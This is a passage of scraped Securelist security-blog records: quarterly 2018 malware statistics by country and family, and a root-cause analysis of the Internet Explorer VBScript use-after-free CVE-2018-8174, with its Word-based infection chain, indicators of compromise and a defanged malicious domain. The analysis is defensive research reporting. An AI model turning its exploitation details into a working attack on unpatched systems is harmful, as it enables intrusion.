As a result, the malware was rebranded FriedEx.\n\nQ1 saw the arrest of the head of the criminal group responsible for the Carbanak and Cobalt malware attacks, as [reported by Europol](<https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain>). Starting in 2013, the criminal group attacked more than 40 organizations, causing damage to the financial industry estimated at more than EUR 1 billion. The main attack vector was to penetrate the target organization's network by sending employees spear-phishing messages with malicious attachments. Having penetrated the internal network via the infected computers, the cybercriminals gained access to the ATM control servers, and through them to the ATMs themselves. Access to the infrastructure, servers, and ATMs allowed the cybercriminals to dispense cash without the use of bank cards, transfer money from the organization to criminal accounts, and inflate bank balances, with money mules being used to collect the proceeds.\n\n#### Financial threat statistics\n\n_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data. 
As of Q1 2017, the statistics include malicious programs for ATMs and POS terminals, but do not include mobile threats._\n\nIn Q1 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 204,448 users.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171350/180511-it-threats-q1-18-statistics-12.png>)\n\n_Number of unique users attacked by financial malware, Q1 2018_\n\n##### Geography of attacks\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that country.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171359/180511-it-threats-q1-18-statistics-13.png>)\n\n**_Geography of banking malware attacks in Q1 2018 (percentage of attacked users)_**\n\n**TOP 10 countries by percentage of attacked users**\n\n| **Country*** | **% of users attacked**** \n---|---|--- \n1 | Cameroon | 2.1 \n2 | Germany | 1.7 \n3 | South Korea | 1.5 \n4 | Libya | 1.5 \n5 | Togo | 1.5 \n6 | Armenia | 1.4 \n7 | Georgia | 1.4 \n8 | Moldova | 1.2 \n9 | Kyrgyzstan | 1.2 \n10 | Indonesia | 1.1 \n \n_These statistics are based on Anti-Virus detection verdicts received from users of Kaspersky Lab products who consented to provide statistical data. \n* Excluded are countries with relatively few Kaspersky Lab product users (under 10,000). \n** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country._\n\n#### TOP 10 banking malware families\n\n**TOP 10 malware families used to attack online banking users in Q1 2018 (by share of attacked users):**\n\n| **Name** | **Verdicts*** | **% of attacked users**** \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 28.0% \n2 | Nymaim | Trojan.Win32.Nymaim | 20.3% \n3 | Caphaw | Backdoor.Win32.Caphaw | 15.2% \n4 | SpyEye | Backdoor.Win32.SpyEye | 11.9% \n5 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 4.5% \n6 | Emotet | Backdoor.Win32.Emotet | 2.4% \n7 | Neurevt | Trojan.Win32.Neurevt | 2.3% \n8 | Shiz | Backdoor.Win32.Shiz | 2.1% \n9 | Gozi | Trojan.Win32.Gozi | 1.9% \n10 | ZAccess | Backdoor.Win32.ZAccess | 1.3% \n \n_* Detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data. \n** Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nIn Q1 2018, TrickBot departed the rating to be replaced by Emotet (2.4%), also known as _Heodo_. Trojan.Win32.Zbot (28%) and Trojan.Win32.Nymaim (20.3%) remain in the lead, while Trojan.Win32.Neurevt (2.3%), also known as Betabot, suffered a major slide. Meanwhile, Caphaw (15.2%) and NeutrinoPOS (4.5%) climbed significantly, as did their Q1 activity.\n\n### Cryptoware programs\n\n#### Q1 events\n\nQ1 2018 passed without major incidents or mass cryptoware epidemics. The highlight was perhaps the emergence and widespread occurrence of a new Trojan called [GandCrab](<https://threatpost.com/tag/gandcrab-ransomware/>). Notable features of the malware include:\n\n * Use of C&C servers in the .bit domain zone (this top-level domain is supported by an alternative decentralized DNS system based on Namecoin technology)\n * Ransom demand in the cryptocurrency Dash\n\nGandCrab was first detected in January. The cybercriminals behind it used spam emails and exploit kits to deliver the cryptoware to victim computers.\n\nThe RaaS (ransomware as a service) distribution model continues to attract malware developers. 
In February, for example, there appeared a new piece of ransomware called [Data Keeper](<https://securelist.ru/data-keeper-ransomware/88883/>), available to any cybercriminal who wanted to distribute it. Via a special resource on the Tor network, the creators of Data Keeper made it possible to generate executable files of the Trojan for subsequent distribution by \"affiliate program\" participants. A dangerous feature of this malware is its ability to automatically propagate inside a local network. Despite this, Data Keeper did not achieve widespread distribution in Q1.\n\nOne notable success in the fight against cryptoware came from Europe: with the assistance of Kaspersky Lab, Belgian police [managed to locate and confiscate](<https://www.europol.europa.eu/newsroom/news/no-more-ransom-update-belgian-federal-police-releases-free-decryption-keys-for-cryakl-ransomware>) a server used by the masterminds behind the Trojan Cryakl. Following the operation, [Kaspersky Lab was given](<https://www.kaspersky.com/about/press-releases/2018_no-more-ransom-update>) several private RSA keys required to decrypt files encrypted with certain versions of the Trojan. As a result, we were able to develop a [tool](<https://support.kaspersky.com/viruses/disinfection/10556>) to assist victims.\n\n#### Number of new modifications\n\nIn Q1 2018, there appeared several new cryptors, but only one, GandCrab, was assigned a new family in our classification. The rest, which are not widely spread, continue to be detected with generic verdicts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171409/180511-it-threats-q1-18-statistics-14.png>)\n\n_Number of new cryptoware modifications, Q2 2017 \u2013 Q1 2018_\n\nThe number of new modifications fell sharply against previous quarters. 
The trend indicates that cybercriminals using this type of malware are becoming less active.\n\n#### Number of users attacked by Trojan cryptors\n\nDuring the reporting period, Kaspersky Lab products blocked cryptoware attacks on the computers of 179,934 unique users. Despite fewer new Trojan modifications, the number of attacked users did not fall against Q3.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171418/180511-it-threats-q1-18-statistics-15.png>)\n\n_Number of unique users attacked by cryptors, Q1 2018_\n\n#### Geography of attacks\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171429/180511-it-threats-q1-18-statistics-16.png>)\n\n**TOP 10 countries attacked by Trojan cryptors**\n\n| **Country*** | **% of users attacked by cryptors**** \n---|---|--- \n1 | Uzbekistan | 1.12 \n2 | Angola | 1.11 \n3 | Vietnam | 1.04 \n4 | Venezuela | 0.95 \n5 | Indonesia | 0.95 \n6 | Pakistan | 0.93 \n7 | China | 0.87 \n8 | Azerbaijan | 0.75 \n9 | Bangladesh | 0.70 \n10 | Mongolia | 0.64 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 50,000). \n** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country._\n\nThe makeup of the rating differs markedly from 2017. That said, most positions were again filled by Asian countries, while Europe did not have a single representative in the TOP 10 countries attacked by cryptors.\n\nDespite not making the TOP 10 last year, Uzbekistan (1.12%) and Angola (1.11%) came first and second. 
Vietnam (1.04%) moved from second to third, Indonesia (0.95%) from third to fifth, and China (0.87%) from fifth to seventh, while Venezuela (0.95%) climbed from eighth to fourth.\n\n**TOP 10 most widespread cryptor families**\n\n| **Name** | **Verdicts*** | **% of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 38.33 | \n2 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 4.07 | \n3 | Cerber | Trojan-Ransom.Win32.Zerber | 4.06 | \n4 | Cryakl | Trojan-Ransom.Win32.Cryakl | 2.99 | \n5 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 2.77 | \n6 | Shade | Trojan-Ransom.Win32.Shade | 2.61 | \n7 | Purgen/GlobeImposter | Trojan-Ransom.Win32.Purgen | 1.64 | \n8 | Crysis | Trojan-Ransom.Win32.Crusis | 1.62 | \n9 | Locky | Trojan-Ransom.Win32.Locky | 1.23 | \n10 | (generic verdict) | Trojan-Ransom.Win32.Gen | 1.15 | \n| | | | | \n \n_* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data. \n** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._\n\nThis quarter, the rating is again topped by WannaCry (38.33%), extending its already impressive lead. Second place was claimed by PolyRansom (4.07%), also known as VirLock, a worm that's been around for a while. This malware substitutes user files with modified instances of its own body, and places victim data inside these copies in an encrypted format. 
Statistics show that a new modification detected in December immediately began to attack user computers.\n\nThe remaining TOP 10 positions are taken by Trojans already known from previous reports: Cerber, Cryakl, Purgen, Crysis, Locky, and Shade.\n\n### Countries that are sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky Lab products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2018, Kaspersky Lab solutions blocked **796,806,112** attacks launched from Internet resources located in 194 countries worldwide. **282,807,433** unique URLs were recognized as malicious by Web Anti-Virus components. These indicators are significantly higher than in previous quarters. This is largely explained by the large number of triggers in response to attempts to download web miners, which came to prominence towards the end of last year and continue to outweigh other web threats.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171439/180511-it-threats-q1-18-statistics-17.png>)\n\n_Distribution of web attack sources by country, Q1 2018_\n\nThis quarter, Web Anti-Virus was most active on resources located in the US (39.14%). 
Canada, China, Ireland, and Ukraine dropped out of TOP 10 to be replaced by Luxembourg (1.33%), Israel (0.99%), Sweden (0.96%), and Singapore (0.91%).\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Belarus | 40.90 \n2 | Ukraine | 40.32 \n3 | Algeria | 39.69 \n4 | Albania | 37.33 \n5 | Moldova | 37.17 \n6 | Greece | 36.83 \n7 | Armenia | 36.78 \n8 | Azerbaijan | 35.13 \n9 | Kazakhstan | 34.64 \n10 | Russia | 34.56 \n11 | Kyrgyzstan | 33.77 \n12 | Venezuela | 33.10 \n13 | Uzbekistan | 31.52 \n14 | Georgia | 31.40 \n15 | Latvia | 29.85 \n16 | Tunisia | 29.77 \n17 | Romania | 29.09 \n18 | Qatar | 28.71 \n19 | Vietnam | 28.66 \n20 | Serbia | 28.55 \n \n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data._ \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000). 
\n** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 23.69% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171448/180511-it-threats-q1-18-statistics-18.png>)\n\n_Geography of malicious web attacks in Q1 2018 (percentage of attacked users)_\n\nThe countries with the safest surfing environments included Iran (9.06%), Singapore (8.94%), Puerto Rico (6.67%), Niger (5.14%), and Cuba (4.44%).\n\n## Local threats\n\n_Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.). _\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q1 2018, our File Anti-Virus detected **187,597,494** malicious and potentially unwanted objects.\n\n**Countries where users faced the highest risk of local infection**\n\nFor each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nThe rating includes only **Malware-class** attacks. 
It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Uzbekistan | 57.03 \n2 | Afghanistan | 56.02 \n3 | Yemen | 54.99 \n4 | Tajikistan | 53.08 \n5 | Algeria | 49.07 \n6 | Turkmenistan | 48.68 \n7 | Ethiopia | 48.21 \n8 | Mongolia | 46.84 \n9 | Kyrgyzstan | 46.53 \n10 | Sudan | 46.44 \n11 | Vietnam | 46.38 \n12 | Syria | 46.12 \n13 | Rwanda | 46.09 \n14 | Laos | 45.66 \n15 | Libya | 45.50 \n16 | Djibouti | 44.96 \n17 | Iraq | 44.65 \n18 | Mauritania | 44.55 \n19 | Kazakhstan | 44.19 \n20 | Bangladesh | 44.15 \n \n_These statistics are based on detection verdicts returned by OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data include detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera and phone memory cards, or external hard drives._ \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000). \n** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 23.39% of computers globally faced at least one **Malware-class** local threat in Q1.\n\nThe figure for Russia was 30.92%.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171457/180511-it-threats-q1-18-statistics-19.png>)\n\n**The safest countries in terms of infection risk included** Estonia (15.86%), Singapore (11.97%), New Zealand (9.24%), Czech Republic (7.89%), Ireland (6.86%), and Japan (5.79%).\n\n_Source: \"IT threat evolution Q1 2018. Statistics\", Securelist, published 2018-05-14, <https://securelist.com/it-threat-evolution-q1-2018-statistics/85541/>. CVEs referenced: CVE-2017-0199, CVE-2017-11882, CVE-2017-8570, CVE-2017-8759, CVE-2018-0802, CVE-2018-4878._\n\n_Securelist, last seen 2018-05-10_\n\nIn late April 2018, a new zero-day vulnerability for Internet Explorer (IE) was found using our sandbox, more than two years after the last in-the-wild example (CVE-2016-0189). This particular vulnerability and subsequent exploit are interesting for many reasons. The following article will examine the core reasons behind the latest vulnerability, CVE-2018-8174.\n\n### **Searching for the zero day**\n\nOur story begins on VirusTotal (VT), where someone uploaded an interesting exploit on April 18, 2018. This exploit was detected by several AV vendors including Kaspersky, specifically by our generic heuristic logic for some older Microsoft Word exploits.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133136/180508-the-king-is-dead-cve-18-1.png>)\n\n_VirusTotal scan results for CVE-2018-8174_\n\nAfter the malicious sample was processed in our [sandbox system](<https://www.kaspersky.com/enterprise-security/wiki-section/products/sandbox>), we noticed that a fully patched version of Microsoft Word was successfully exploited. From this point we began a deeper analysis of the exploit. 
Let's take a look at the full infection chain:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133144/180508-the-king-is-dead-cve-18-2.png>)\n\n_Infection chain_\n\nThe infection chain consists of the following steps:\n\n * A victim receives a malicious Microsoft Word document.\n * After opening the malicious document, a second stage of the exploit is downloaded; an HTML page containing VBScript code.\n * The VBScript code triggers a Use After Free (UAF) vulnerability and executes shellcode.\n\n### **Initial analysis**\n\nWe'll start our analysis with the initial Rich Text Format (RTF) document, that was used to deliver the actual exploit for IE. It only contains one object, and its contents are obfuscated using a known obfuscation technique we call \"[nibble drop](<https://securelist.com/disappearing-bytes/84017/>)\".\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133151/180508-the-king-is-dead-cve-18-3.png>)\n\n_Obfuscated object data in RTF document_\n\nAfter deobfuscation and hex-decoding of the object data, we can see that this is an OLE object that contains a [URL Moniker](<https://msdn.microsoft.com/ru-ru/en-en/library/windows/desktop/ms688580\\(v=vs.85\\).aspx>) CLSID. Because of this, the exploit initially resembles an older vulnerability leveraging the Microsoft HTA handler ([CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>)).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133158/180508-the-king-is-dead-cve-18-4.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133205/180508-the-king-is-dead-cve-18-5.png>)\n\n_URL Moniker is used to load an IE exploit_\n\nWith the CVE-2017-0199 vulnerability, Word tries to execute the file with the default file handler based on its attributes; the Content-Type HTTP header in the server's response being one of them. 
Because the default handler for the \"application/hta\" Content-Type is mshta.exe, it is chosen as the OLE server to run the script unrestricted. This allows an attacker to directly call ShellExecute and launch a payload of their choice.\n\nHowever, if we follow the embedded URL in the latest exploit, we can see that the content type in the server's response is not \"application/hta\", which was a requirement for CVE-2017-0199 exploitation, but rather \"text/html\". The default OLE server for \"text/html\" is mshtml.dll, which is the library that contains the engine behind Internet Explorer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133212/180508-the-king-is-dead-cve-18-6.png>)\n\n_WINWORD.exe querying registry for correct OLE server_\n\nFurthermore, the page contains VBScript, which is loaded with a safemode flag set to its default value, '0xE'. Because this prevents an attacker from directly executing a payload, as was the case with the HTA handler, an Internet Explorer exploit is needed to overcome this restriction.\n\nUsing a URL moniker like that to load a remote web page is possible because Microsoft's patch for Moniker-related vulnerabilities (CVE-2017-0199, CVE-2017-8570 and CVE-2017-8759) introduced an activation filter, which allows applications to specify which COM objects are restricted from being instantiated at runtime.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133220/180508-the-king-is-dead-cve-18-7.png>)\n\n_Some of the filtered COM objects, restricted from being created by IActivationFilter in MSO.dll_\n\nAt the time of this analysis, the list of filtered CLSIDs consisted of 16 entries. The MSHTML CLSID ({{25336920-03F9-11CF-8FD0-00AA00686F13}}) is not in the list, which is why the MSHTML COM server is successfully created in the Word context.\n\nThis is where it becomes interesting. 
Despite a Word document being the initial attack vector, the vulnerability is actually in VBScript, not in Microsoft Word. This is the first time we've seen a URL Moniker used to load an IE exploit, and we believe this technique will be used heavily by malware authors in the future. This technique allows one to load and render a web page using the IE engine, even if the default browser on a victim's machine is set to something different.\n\nThe VBScript in the downloaded HTML page contains both function names and integer values that are obfuscated.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133228/180508-the-king-is-dead-cve-18-8.png>)\n\n_Obfuscated IE exploit_\n\n### **Vulnerability root cause analysis**\n\nFor the root cause analysis we only need to look at the first function ('TriggerVuln') in the deobfuscated version, which is called right after 'RandomizeValues' and 'CookieCheck'.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133234/180508-the-king-is-dead-cve-18-9.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133240/180508-the-king-is-dead-cve-18-10.png>)\n\n_Vulnerability Trigger procedure after deobfuscation_\n\nTo achieve the desired heap layout and to guarantee that the freed class object memory will be reused with the 'ClassToReuse' object, the exploit allocates some class objects. 
To trigger the vulnerability this code could be minimized to the following proof-of-concept (PoC):\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133249/180508-the-king-is-dead-cve-18-11.png>)\n\n_CVE-2018-8174 Proof Of Concept_\n\nWhen we then launch this PoC in Internet Explorer with page heap enabled we can observe a crash at the OLEAUT32!VariantClear function.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133256/180508-the-king-is-dead-cve-18-12.png>)\n\n_Access Violation on a call to freed memory_\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133304/180508-the-king-is-dead-cve-18-13.png>)\n\n_Freed memory pointer is reused when the second array (ArrB) is destroyed_\n\nWith this PoC we were able to trigger a Use-after-free vulnerability; both ArrA(1) and ArrB(1) were referencing the same 'ClassVuln' object in memory. This is possible because when \"Erase ArrA\" is called, the vbscript!VbsErase function determines that the type of the object to delete is a SafeArray, and then calls OLEAUT32!SafeArrayDestroy.\n\nIt checks that the pointer to a [tagSafeArray structure](<https://msdn.microsoft.com/en-us/library/windows/desktop/ms221482\\(v=vs.85\\).aspx>) is not NULL and that its reference count, stored in the cLocks field is zero, and then continues to call ReleaseResources.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133315/180508-the-king-is-dead-cve-18-14.png>)\n\n_VARTYPE of ArrA(1) is VT_DISPATCH, so VBScriptClass::Release is called to destruct the object_\n\nReleaseResources, in turn will check the fFeatures flags variable, and since we have an array of VARIANTs, it will subsequently call VariantClear; a function that iterates each member of an array and performs the necessary deinitialization and calls the relevant class destructor if necessary. 
In this case, VBScriptClass::Release is called to destroy the object correctly and handle destructors like Class_Terminate, since the VARTYPE of ArrA(1) is VT_DISPATCH.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133323/180508-the-king-is-dead-cve-18-15.png>)\n\n_Root cause of CVE-2018-8174 - 'refCount' being checked only once, before TerminateClass function_\n\nThis ends up being the root cause of the vulnerability. Inside the VBScriptClass::Release function, the reference count is checked only once, at the beginning of the function. Even though it can be (and actually is, in the PoC) incremented in an overloaded TerminateClass function, no checks will be made before finally freeing the class object.\n\n[Class_Terminate](<https://docs.microsoft.com/en-us/dotnet/visual-basic/programming-guide/language-features/objects-and-classes/object-lifetime-how-objects-are-created-and-destroyed>) is a deprecated method, now replaced by the 'Finalize' procedure. It is used to free acquired resources during object destruction and is executed as soon as object is set to nothing and there are no more references to that object. In our case, the Class_Terminate method is overloaded, and when a call to VBScriptClass::TerminateClass is made, it is dispatched to the overloaded method instead. Inside of that overloaded method, another reference is created to the ArrA(1) member. At this point ArrB(1) references ArrA(1), which holds a soon to be freed ClassVuln object. \n\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133332/180508-the-king-is-dead-cve-18-16.png>)\n\n_Crash, due to calling an invalid virtual method when freeing second object_\n\nAfter the Class_Terminate sub is finished, the object at ArrA(1) is freed, but ArrB(1) still maintains a reference to that freed class object. 
When the execution continues, and ArrB is erased, the whole cycle repeats, except that this time, ArrB(1) is referencing a freed ClassVuln object, and so we observe a crash when one of the virtual methods in the ClassVuln vtable is called.\n\n### **Conclusion**\n\nIn this write-up we analyzed the core reasons behind CVE-2018-8174, a particularly interesting Use-After-Free vulnerability that was possible due to incorrect object lifetime handling in the Class_Terminate VBScript method. The exploitation process is different from what we've seen in exploits for older vulnerabilities (CVE-2016-0189 and CVE-2014-6332), as the Godmode technique is no longer used. The full exploitation chain is as interesting as the vulnerability itself, but is out of the scope of this article.\n\nWith CVE-2018-8174 being the first public exploit to use a URL moniker to load an IE exploit in Word, we believe that this technique, unless fixed, will be heavily abused by attackers in the future, as it allows an attacker to force IE to load, ignoring the default browser settings on a victim's system.\n\nWe expect this vulnerability to become one of the most exploited in the near future, as it won't be long until exploit kit authors start abusing it in both drive-by (via browser) and spear-phishing (via document) campaigns. To stay protected, we recommend applying the latest security updates and using a security solution with [behavior detection capabilities](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>).\n\nIn our opinion this is the same exploit that the Qihoo360 Core Security Team called \"Double Kill\" in their [recent publication](<https://weibo.com/ttarticle/p/show?id=2309404230886689265523>). 
While this exploit is not limited to browser exploitation, it was reported as an IE zero day, which caused certain confusion in the security community.\n\nAfter finding this exploit we immediately shared the relevant information with Microsoft and they confirmed that it is in fact [CVE-2018-8174](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8174>), and received an acknowledgement for the report.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/10092043/180508-the-king-is-dead-cve-18-20.png>)\n\n_This exploit was found in the wild and was used by an APT actor. More information about that APT actor and usage of the exploit is available to customers of Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com_\n\n### **Detection**\n\nKaspersky Lab products successfully detect and block all stages of the exploitation chain and payload with the following verdicts:\n\n * HEUR:Exploit.MSOffice.Generic \u2013 RTF document\n * PDM:Exploit.Win32.Generic - IE exploit \u2013 detection with [Automatic Exploit Prevention technology](<https://www.kaspersky.com/enterprise-security/wiki-section/products/automatic-exploit-prevention-aep>)\n * HEUR:Exploit.Script.Generic \u2013 IE exploit\n * HEUR:Trojan.Win32.Generic - Payload\n\n### **IOCs**\n\n * b48ddad351dd16e4b24f3909c53c8901 - RTF document\n * 15eafc24416cbf4cfe323e9c271e71e7 - Internet Explorer exploit (CVE-2018-8174)\n * 1ce4a38b6ea440a6734f7c049f5c47e2 - Payload\n * autosoundcheckers[.]com", "cvss3": {}, "published": "2018-05-09T06:00:56", "type": "securelist", "title": "The King is dead. 
Long live the King!", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2014-6332", "CVE-2016-0189", "CVE-2017-0199", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-8174"], "modified": "2018-05-09T06:00:56", "id": "SECURELIST:4FE9AF32AEB194433587B75288D50FDA", "href": "https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-24T11:03:46", "description": "\n\n## Q2 figures\n\nAccording to KSN:\n\n * Kaspersky Lab solutions blocked 962,947,023 attacks launched from online resources located in 187 countries across the globe.\n * 351,913,075 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 215,762 users.\n * Ransomware attacks were registered on the computers of 158,921 unique users.\n * Our File Anti-Virus logged 192,053,604 unique malicious and potentially unwanted objects.\n * Kaspersky Lab products for mobile devices detected: \n * 1,744,244 malicious installation packages\n * 61,045 installation packages for mobile banking Trojans\n * 14,119 installation packages for mobile ransomware Trojans.\n\n## Mobile threats\n\n### General statistics\n\nIn Q2 2018, Kaspersky Lab detected 1,744,244 malicious installation packages, which is 421,666 packages more than in the previous quarter.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175855/180803-it-threat-evolution-q2-2018-statistics-1.png>)\n\n_Number of detected malicious installation packages, Q2 2017 \u2013 Q2 2018_\n\n#### **Distribution of detected mobile apps by type**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175922/180803-it-threat-evolution-q2-2018-statistics-2-0.png>)\n\n_Distribution of newly detected mobile apps by type, Q1 
2018_\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175916/180803-it-threat-evolution-q2-2018-statistics-2.png>)\n\n_Distribution of newly detected mobile apps by type, Q2 2018_\n\nAmong all the threats detected in Q2 2018, the lion's share belonged to potentially unwanted RiskTool apps (55.3%); compared to the previous quarter, their share rose by 6 p.p. Members of the RiskTool.AndroidOS.SMSreg family contributed most to this indicator.\n\nSecond place was taken by Trojan-Dropper threats (13%), whose share fell by 7 p.p. Most detected files of this type came from the families Trojan-Dropper.AndroidOS.Piom and Trojan-Dropper.AndroidOS.Hqwar.\n\nThe share of advertising apps continued to decrease by 8%, accounting for 9% (against 11%) of all detected threats.\n\nA remarkable development during the reporting period was that SMS Trojans doubled their share, to 8.5% in Q2 from 4.5% in Q1.\n\n#### **TOP 20 mobile malware**\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool or Adware._\n\n | Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 70.04 \n2 | Trojan.AndroidOS.Boogr.gsh | 12.17 \n3 | Trojan-Dropper.AndroidOS.Lezok.p | 4.41 \n4 | Trojan.AndroidOS.Agent.rx | 4.11 \n5 | Trojan.AndroidOS.Piom.toe | 3.44 \n6 | Trojan.AndroidOS.Triada.dl | 3.15 \n7 | Trojan.AndroidOS.Piom.tmi | 2.71 \n8 | Trojan.AndroidOS.Piom.sme | 2.69 \n9 | Trojan-Dropper.AndroidOS.Hqwar.i | 2.54 \n10 | Trojan-Downloader.AndroidOS.Agent.ga | 2.42 \n11 | Trojan-Dropper.AndroidOS.Agent.ii | 2.25 \n12 | Trojan-Dropper.AndroidOS.Hqwar.ba | 1.80 \n13 | Trojan.AndroidOS.Agent.pac | 1.73 \n14 | Trojan.AndroidOS.Dvmap.a | 1.64 \n15 | Trojan-Dropper.AndroidOS.Lezok.b | 1.55 \n16 | Trojan-Dropper.AndroidOS.Tiny.d | 1.37 \n17 | Trojan.AndroidOS.Agent.rt | 1.29 \n18 | Trojan.AndroidOS.Hiddapp.bn | 1.26 \n19 | Trojan.AndroidOS.Piom.rfw | 1.20 \n20 | Trojan-Dropper.AndroidOS.Lezok.t | 1.19 \n \n_* 
